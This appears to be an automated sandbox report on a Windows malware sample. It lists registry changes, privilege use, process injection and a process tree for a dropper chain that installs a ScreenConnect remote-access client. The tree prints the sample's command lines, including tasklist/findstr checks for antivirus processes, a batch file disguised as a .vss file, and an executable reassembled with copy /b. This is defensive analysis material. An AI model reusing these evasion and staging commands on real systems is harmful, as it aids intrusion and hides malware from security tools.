Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ScreenConnect.ClientService.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tasklist.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Exam.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe

Checks SCSI registry key(s) 3 TTPs 5 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters	vssvc.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr	vssvc.exe
Set value (data)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr\PartitionTableCache = 0000000004000000d433842ca64169410000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000000000000c01200000000ffffffff000000002701010000080000d433842c0000000000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000d01200000000000020ed3a000000ffffffff000000000700010000680900d433842c000000000000d012000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000f0ff3a0000000000000005000000ffffffff000000000700010000f87f1dd433842c000000000000f0ff3a00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff000000000000000000000000d433842c00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000	vssvc.exe
Set value (data)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr\SnapshotDataCache = 534e41505041525401000000700000008ec7416a0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000	vssvc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters	vssvc.exe

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	ScreenConnect.WindowsClient.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	ScreenConnect.WindowsClient.exe

Delays execution with timeout.exe 1 IoCs

defense_evasion

pid	Process
1772	timeout.exe

Modifies data under HKEY_USERS 13 IoCs

description	ioc	Process
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	ScreenConnect.WindowsClient.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	ScreenConnect.WindowsClient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	ScreenConnect.ClientService.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	ScreenConnect.ClientService.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	ScreenConnect.ClientService.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\28	msiexec.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	ScreenConnect.WindowsClient.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	ScreenConnect.WindowsClient.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	ScreenConnect.WindowsClient.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	ScreenConnect.ClientService.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	ScreenConnect.ClientService.exe
Key deleted	\REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\27\52C64B7E	msiexec.exe
Key deleted	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\27	msiexec.exe

Modifies registry class 37 IoCs

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\5B15089AFED232366FA328FFFAF9391D\833E9D2FDB63967BDC29C192594F32A9	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\833E9D2FDB63967BDC29C192594F32A9\SourceList	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\833E9D2FDB63967BDC29C192594F32A9\SourceList\Net\1 = "C:\\Users\\Admin\\AppData\\Local\\Temp\\ScreenConnect\\24.4.4.9118\\f63a82ffaf9f93d1\\"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\833E9D2FDB63967BDC29C192594F32A9\SourceList\Media\1 = ";"	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\sc-f63a82ffaf9f93d1	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\833E9D2FDB63967BDC29C192594F32A9\Language = "1033"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\833E9D2FDB63967BDC29C192594F32A9\ProductIcon = "C:\\Windows\\Installer\\{F2D9E338-36BD-B769-CD92-1C2995F4239A}\\DefaultIcon"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\833E9D2FDB63967BDC29C192594F32A9\SourceList\PackageName = "ScreenConnect.ClientSetup.msi"	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\sc-f63a82ffaf9f93d1\UseOriginalUrlEncoding = "1"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\833E9D2FDB63967BDC29C192594F32A9\PackageCode = "833E9D2FDB63967BDC29C192594F32A9"	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\sc-f63a82ffaf9f93d1\shell\open	msiexec.exe
Key created	\REGISTRY\MACHINE\Software\Classes\CLSID\{6FF59A85-BC37-4CD4-C7A7-316889DB6DBE}	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6FF59A85-BC37-4CD4-C7A7-316889DB6DBE}\ = "ScreenConnect Client (f63a82ffaf9f93d1) Credential Provider"	msiexec.exe
Key created	\REGISTRY\MACHINE\Software\Classes\CLSID\{6FF59A85-BC37-4CD4-C7A7-316889DB6DBE}\InprocServer32	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6FF59A85-BC37-4CD4-C7A7-316889DB6DBE}\InprocServer32\ThreadingModel = "Apartment"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\833E9D2FDB63967BDC29C192594F32A9\ProductName = "ScreenConnect Client (f63a82ffaf9f93d1)"	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\833E9D2FDB63967BDC29C192594F32A9\SourceList\Media	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\833E9D2FDB63967BDC29C192594F32A9\SourceList\LastUsedSource = "n;1;C:\\Users\\Admin\\AppData\\Local\\Temp\\ScreenConnect\\24.4.4.9118\\f63a82ffaf9f93d1\\"	msiexec.exe
Key created	\REGISTRY\MACHINE\Software\Classes\sc-f63a82ffaf9f93d1\shell\open\command	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\833E9D2FDB63967BDC29C192594F32A9\AdvertiseFlags = "388"	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\833E9D2FDB63967BDC29C192594F32A9\InstanceType = "0"	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\5B15089AFED232366FA328FFFAF9391D	msiexec.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\833E9D2FDB63967BDC29C192594F32A9\Clients = 3a0000000000	msiexec.exe
Key created	\REGISTRY\MACHINE\Software\Classes\sc-f63a82ffaf9f93d1	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\833E9D2FDB63967BDC29C192594F32A9	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\sc-f63a82ffaf9f93d1\shell	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\sc-f63a82ffaf9f93d1\shell\open\command\ = "\"C:\\Program Files (x86)\\ScreenConnect Client (f63a82ffaf9f93d1)\\ScreenConnect.WindowsClient.exe\" \"%1\""	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\833E9D2FDB63967BDC29C192594F32A9\Full	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\833E9D2FDB63967BDC29C192594F32A9	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\833E9D2FDB63967BDC29C192594F32A9\Assignment = "1"	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\833E9D2FDB63967BDC29C192594F32A9\DeploymentFlags = "3"	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\sc-f63a82ffaf9f93d1\shell\open\command	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\833E9D2FDB63967BDC29C192594F32A9\AuthorizedLUAApp = "0"	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\833E9D2FDB63967BDC29C192594F32A9\SourceList\Net	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\sc-f63a82ffaf9f93d1\URL Protocol	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6FF59A85-BC37-4CD4-C7A7-316889DB6DBE}\InprocServer32\ = "C:\\Program Files (x86)\\ScreenConnect Client (f63a82ffaf9f93d1)\\ScreenConnect.WindowsCredentialProvider.dll"	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\833E9D2FDB63967BDC29C192594F32A9\Version = "402915332"	msiexec.exe

Suspicious behavior: EnumeratesProcesses 62 IoCs

pid	Process
5476	1W48q9.exe
5476	1W48q9.exe
4780	rapes.exe
4780	rapes.exe
4792	2z6609.exe
4792	2z6609.exe
4792	2z6609.exe
4792	2z6609.exe
4792	2z6609.exe
4792	2z6609.exe
4852	3g52f.exe
4852	3g52f.exe
3492	rapes.exe
3492	rapes.exe
3320	eaaa0a3e14.exe
3320	eaaa0a3e14.exe
3320	eaaa0a3e14.exe
3320	eaaa0a3e14.exe
3320	eaaa0a3e14.exe
3320	eaaa0a3e14.exe
4292	Exam.com
4292	Exam.com
4292	Exam.com
4292	Exam.com
4292	Exam.com
4292	Exam.com
3212	BIm18E9.exe
3212	BIm18E9.exe
4964	msiexec.exe
4964	msiexec.exe
3528	ScreenConnect.ClientService.exe
3528	ScreenConnect.ClientService.exe
3528	ScreenConnect.ClientService.exe
3528	ScreenConnect.ClientService.exe
3528	ScreenConnect.ClientService.exe
3528	ScreenConnect.ClientService.exe
4292	Exam.com
4292	Exam.com
4292	Exam.com
4292	Exam.com
2828	svchost.exe
2828	svchost.exe
2828	svchost.exe
2828	svchost.exe
5924	Exam.com
5924	Exam.com
5924	Exam.com
5924	Exam.com
5924	Exam.com
5924	Exam.com
5768	rapes.exe
5768	rapes.exe
5924	Exam.com
5924	Exam.com
5924	Exam.com
5924	Exam.com
5400	svchost.exe
5400	svchost.exe
5400	svchost.exe
5400	svchost.exe
2524	rapes.exe
2524	rapes.exe

Suspicious behavior: LoadsDriver 2 IoCs

pid	Process
660	Process not Found
660	Process not Found

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	5868	tasklist.exe
Token: SeDebugPrivilege	3284	tasklist.exe
Token: SeDebugPrivilege	5476	tool.exe
Token: SeShutdownPrivilege	5144	msiexec.exe
Token: SeIncreaseQuotaPrivilege	5144	msiexec.exe
Token: SeSecurityPrivilege	4964	msiexec.exe
Token: SeCreateTokenPrivilege	5144	msiexec.exe
Token: SeAssignPrimaryTokenPrivilege	5144	msiexec.exe
Token: SeLockMemoryPrivilege	5144	msiexec.exe
Token: SeIncreaseQuotaPrivilege	5144	msiexec.exe
Token: SeMachineAccountPrivilege	5144	msiexec.exe
Token: SeTcbPrivilege	5144	msiexec.exe
Token: SeSecurityPrivilege	5144	msiexec.exe
Token: SeTakeOwnershipPrivilege	5144	msiexec.exe
Token: SeLoadDriverPrivilege	5144	msiexec.exe
Token: SeSystemProfilePrivilege	5144	msiexec.exe
Token: SeSystemtimePrivilege	5144	msiexec.exe
Token: SeProfSingleProcessPrivilege	5144	msiexec.exe
Token: SeIncBasePriorityPrivilege	5144	msiexec.exe
Token: SeCreatePagefilePrivilege	5144	msiexec.exe
Token: SeCreatePermanentPrivilege	5144	msiexec.exe
Token: SeBackupPrivilege	5144	msiexec.exe
Token: SeRestorePrivilege	5144	msiexec.exe
Token: SeShutdownPrivilege	5144	msiexec.exe
Token: SeDebugPrivilege	5144	msiexec.exe
Token: SeAuditPrivilege	5144	msiexec.exe
Token: SeSystemEnvironmentPrivilege	5144	msiexec.exe
Token: SeChangeNotifyPrivilege	5144	msiexec.exe
Token: SeRemoteShutdownPrivilege	5144	msiexec.exe
Token: SeUndockPrivilege	5144	msiexec.exe
Token: SeSyncAgentPrivilege	5144	msiexec.exe
Token: SeEnableDelegationPrivilege	5144	msiexec.exe
Token: SeManageVolumePrivilege	5144	msiexec.exe
Token: SeImpersonatePrivilege	5144	msiexec.exe
Token: SeCreateGlobalPrivilege	5144	msiexec.exe
Token: SeCreateTokenPrivilege	5144	msiexec.exe
Token: SeAssignPrimaryTokenPrivilege	5144	msiexec.exe
Token: SeLockMemoryPrivilege	5144	msiexec.exe
Token: SeIncreaseQuotaPrivilege	5144	msiexec.exe
Token: SeMachineAccountPrivilege	5144	msiexec.exe
Token: SeTcbPrivilege	5144	msiexec.exe
Token: SeSecurityPrivilege	5144	msiexec.exe
Token: SeTakeOwnershipPrivilege	5144	msiexec.exe
Token: SeLoadDriverPrivilege	5144	msiexec.exe
Token: SeSystemProfilePrivilege	5144	msiexec.exe
Token: SeSystemtimePrivilege	5144	msiexec.exe
Token: SeProfSingleProcessPrivilege	5144	msiexec.exe
Token: SeIncBasePriorityPrivilege	5144	msiexec.exe
Token: SeCreatePagefilePrivilege	5144	msiexec.exe
Token: SeCreatePermanentPrivilege	5144	msiexec.exe
Token: SeBackupPrivilege	5144	msiexec.exe
Token: SeRestorePrivilege	5144	msiexec.exe
Token: SeShutdownPrivilege	5144	msiexec.exe
Token: SeDebugPrivilege	5144	msiexec.exe
Token: SeAuditPrivilege	5144	msiexec.exe
Token: SeSystemEnvironmentPrivilege	5144	msiexec.exe
Token: SeChangeNotifyPrivilege	5144	msiexec.exe
Token: SeRemoteShutdownPrivilege	5144	msiexec.exe
Token: SeUndockPrivilege	5144	msiexec.exe
Token: SeSyncAgentPrivilege	5144	msiexec.exe
Token: SeEnableDelegationPrivilege	5144	msiexec.exe
Token: SeManageVolumePrivilege	5144	msiexec.exe
Token: SeImpersonatePrivilege	5144	msiexec.exe
Token: SeCreateGlobalPrivilege	5144	msiexec.exe

Suspicious use of FindShellTrayWindow 9 IoCs

pid	Process
5476	1W48q9.exe
4292	Exam.com
4292	Exam.com
4292	Exam.com
5144	msiexec.exe
5144	msiexec.exe
5924	Exam.com
5924	Exam.com
5924	Exam.com

Suspicious use of SendNotifyMessage 6 IoCs

pid	Process
4292	Exam.com
4292	Exam.com
4292	Exam.com
5924	Exam.com
5924	Exam.com
5924	Exam.com

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 5400 wrote to memory of 232	5400	d3053f42c2c51006ff8ae62525ef2221.exe	86
PID 5400 wrote to memory of 232	5400	d3053f42c2c51006ff8ae62525ef2221.exe	86
PID 5400 wrote to memory of 232	5400	d3053f42c2c51006ff8ae62525ef2221.exe	86
PID 232 wrote to memory of 5476	232	A0v32.exe	89
PID 232 wrote to memory of 5476	232	A0v32.exe	89
PID 232 wrote to memory of 5476	232	A0v32.exe	89
PID 5476 wrote to memory of 4780	5476	1W48q9.exe	90
PID 5476 wrote to memory of 4780	5476	1W48q9.exe	90
PID 5476 wrote to memory of 4780	5476	1W48q9.exe	90
PID 232 wrote to memory of 4792	232	A0v32.exe	91
PID 232 wrote to memory of 4792	232	A0v32.exe	91
PID 232 wrote to memory of 4792	232	A0v32.exe	91
PID 5400 wrote to memory of 4852	5400	d3053f42c2c51006ff8ae62525ef2221.exe	96
PID 5400 wrote to memory of 4852	5400	d3053f42c2c51006ff8ae62525ef2221.exe	96
PID 5400 wrote to memory of 4852	5400	d3053f42c2c51006ff8ae62525ef2221.exe	96
PID 4780 wrote to memory of 2280	4780	rapes.exe	99
PID 4780 wrote to memory of 2280	4780	rapes.exe	99
PID 4780 wrote to memory of 2280	4780	rapes.exe	99
PID 2280 wrote to memory of 1392	2280	TbV75ZR.exe	101
PID 2280 wrote to memory of 1392	2280	TbV75ZR.exe	101
PID 2280 wrote to memory of 1392	2280	TbV75ZR.exe	101
PID 4780 wrote to memory of 3320	4780	rapes.exe	104
PID 4780 wrote to memory of 3320	4780	rapes.exe	104
PID 4780 wrote to memory of 3320	4780	rapes.exe	104
PID 1392 wrote to memory of 5868	1392	CMD.exe	105
PID 1392 wrote to memory of 5868	1392	CMD.exe	105
PID 1392 wrote to memory of 5868	1392	CMD.exe	105
PID 1392 wrote to memory of 3484	1392	CMD.exe	106
PID 1392 wrote to memory of 3484	1392	CMD.exe	106
PID 1392 wrote to memory of 3484	1392	CMD.exe	106
PID 1392 wrote to memory of 3284	1392	CMD.exe	107
PID 1392 wrote to memory of 3284	1392	CMD.exe	107
PID 1392 wrote to memory of 3284	1392	CMD.exe	107
PID 1392 wrote to memory of 5744	1392	CMD.exe	108
PID 1392 wrote to memory of 5744	1392	CMD.exe	108
PID 1392 wrote to memory of 5744	1392	CMD.exe	108
PID 1392 wrote to memory of 1740	1392	CMD.exe	109
PID 1392 wrote to memory of 1740	1392	CMD.exe	109
PID 1392 wrote to memory of 1740	1392	CMD.exe	109
PID 1392 wrote to memory of 2592	1392	CMD.exe	110
PID 1392 wrote to memory of 2592	1392	CMD.exe	110
PID 1392 wrote to memory of 2592	1392	CMD.exe	110
PID 1392 wrote to memory of 5976	1392	CMD.exe	111
PID 1392 wrote to memory of 5976	1392	CMD.exe	111
PID 1392 wrote to memory of 5976	1392	CMD.exe	111
PID 1392 wrote to memory of 5436	1392	CMD.exe	112
PID 1392 wrote to memory of 5436	1392	CMD.exe	112
PID 1392 wrote to memory of 5436	1392	CMD.exe	112
PID 1392 wrote to memory of 3000	1392	CMD.exe	113
PID 1392 wrote to memory of 3000	1392	CMD.exe	113
PID 1392 wrote to memory of 3000	1392	CMD.exe	113
PID 1392 wrote to memory of 4292	1392	CMD.exe	114
PID 1392 wrote to memory of 4292	1392	CMD.exe	114
PID 1392 wrote to memory of 4292	1392	CMD.exe	114
PID 1392 wrote to memory of 5184	1392	CMD.exe	115
PID 1392 wrote to memory of 5184	1392	CMD.exe	115
PID 1392 wrote to memory of 5184	1392	CMD.exe	115
PID 4780 wrote to memory of 5476	4780	rapes.exe	116
PID 4780 wrote to memory of 5476	4780	rapes.exe	116
PID 4780 wrote to memory of 5476	4780	rapes.exe	116
PID 5476 wrote to memory of 5144	5476	tool.exe	117
PID 5476 wrote to memory of 5144	5476	tool.exe	117
PID 5476 wrote to memory of 5144	5476	tool.exe	117
PID 4964 wrote to memory of 700	4964	msiexec.exe	120

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

C:\Windows\system32\sihost.exe
sihost.exe
1⤵
PID:2628
- C:\Windows\SysWOW64\svchost.exe
  "C:\Windows\System32\svchost.exe"
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  PID:2828
- C:\Windows\SysWOW64\svchost.exe
  "C:\Windows\System32\svchost.exe"
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  PID:5400

C:\Users\Admin\AppData\Local\Temp\d3053f42c2c51006ff8ae62525ef2221.exe
"C:\Users\Admin\AppData\Local\Temp\d3053f42c2c51006ff8ae62525ef2221.exe"
1⤵
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:5400
- C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\A0v32.exe
  C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\A0v32.exe
  2⤵
  - Executes dropped EXE
  - Adds Run key to start application
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:232
- - C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\1W48q9.exe
    C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\1W48q9.exe
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Checks computer location settings
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Drops file in Windows directory
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of WriteProcessMemory
    PID:5476
  - - C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
      "C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
      4⤵
      Identifies VirtualBox via ACPI registry values (likely anti-VM)
      Downloads MZ/PE file
      Checks BIOS information in registry
      Checks computer location settings
      Executes dropped EXE
      Identifies Wine through registry keys
      Suspicious use of NtSetInformationThreadHideFromDebugger
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of WriteProcessMemory
      PID:4780
    - - C:\Users\Admin\AppData\Local\Temp\10338870101\TbV75ZR.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10338870101\TbV75ZR.exe"
        5⤵
        Checks computer location settings
        Executes dropped EXE
        Drops file in Windows directory
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:2280
      - C:\Windows\SysWOW64\CMD.exe
        
        "C:\Windows\system32\CMD.exe" /c copy Edit.vss Edit.vss.bat & Edit.vss.bat
        6⤵
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:1392
        
        C:\Windows\SysWOW64\tasklist.exe
        
        tasklist
        7⤵
        Enumerates processes with tasklist
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:5868
        
        C:\Windows\SysWOW64\findstr.exe
        
        findstr /I "opssvc wrsa"
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:3484
        
        C:\Windows\SysWOW64\tasklist.exe
        
        tasklist
        7⤵
        Enumerates processes with tasklist
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:3284
        
        C:\Windows\SysWOW64\findstr.exe
        
        findstr "SophosHealth bdservicehost AvastUI AVGUI nsWscSvc ekrn"
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:5744
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c md 267978
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:1740
        
        C:\Windows\SysWOW64\extrac32.exe
        
        extrac32 /Y /E Spanish.vss
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:2592
        
        C:\Windows\SysWOW64\findstr.exe
        
        findstr /V "East" Removed
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:5976
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c copy /b 267978\Exam.com + Vermont + Conflict + Remarks + Safer + Districts + Eddie + Awful + Garage + Sexually + Mitsubishi + Freeware 267978\Exam.com
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:5436
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c copy /b ..\Austin.vss + ..\Canal.vss + ..\Cottage.vss + ..\Engineers.vss + ..\Racks.vss + ..\Spy.vss + ..\Weekends.vss + ..\Shirt.vss + ..\Fields.vss + ..\Flyer.vss + ..\Strengthening.vss + ..\Floors.vss j
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:3000
        
        C:\Users\Admin\AppData\Local\Temp\267978\Exam.com
        
        Exam.com j
        7⤵
        Suspicious use of NtCreateUserProcessOtherParentProcess
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        
        PID:4292
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4292 -s 1044
        8⤵
        Program crash
        
        PID:5420
        
        C:\Windows\SysWOW64\choice.exe
        
        choice /d y /t 5
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:5184
    - - C:\Users\Admin\AppData\Local\Temp\10340260101\eaaa0a3e14.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10340260101\eaaa0a3e14.exe"
        5⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:3320
    - - C:\Users\Admin\AppData\Local\Temp\10340340101\tool.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10340340101\tool.exe"
        5⤵
        Checks computer location settings
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:5476
      - C:\Windows\SysWOW64\msiexec.exe
        
        "C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\AppData\Local\Temp\ScreenConnect\24.4.4.9118\f63a82ffaf9f93d1\ScreenConnect.ClientSetup.msi"
        6⤵
        Enumerates connected drives
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of FindShellTrayWindow
        
        PID:5144
    - - C:\Users\Admin\AppData\Local\Temp\10340560101\WLbfHbp.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10340560101\WLbfHbp.exe"
        5⤵
        Checks computer location settings
        Executes dropped EXE
        Drops file in Windows directory
        System Location Discovery: System Language Discovery
        
        PID:3432
      - C:\Windows\SysWOW64\CMD.exe
        
        "C:\Windows\system32\CMD.exe" /c copy Edit.vss Edit.vss.bat & Edit.vss.bat
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:644
        
        C:\Windows\SysWOW64\tasklist.exe
        
        tasklist
        7⤵
        Enumerates processes with tasklist
        System Location Discovery: System Language Discovery
        
        PID:3752
        
        C:\Windows\SysWOW64\findstr.exe
        
        findstr /I "opssvc wrsa"
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:2124
        
        C:\Windows\SysWOW64\tasklist.exe
        
        tasklist
        7⤵
        Enumerates processes with tasklist
        System Location Discovery: System Language Discovery
        
        PID:3148
        
        C:\Windows\SysWOW64\findstr.exe
        
        findstr "SophosHealth bdservicehost AvastUI AVGUI nsWscSvc ekrn"
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:5360
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c md 267978
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:732
        
        C:\Windows\SysWOW64\extrac32.exe
        
        extrac32 /Y /E Spanish.vss
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:4992
        
        C:\Windows\SysWOW64\findstr.exe
        
        findstr /V "East" Removed
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:5868
        
        C:\Windows\SysWOW64\cmd.exe
        
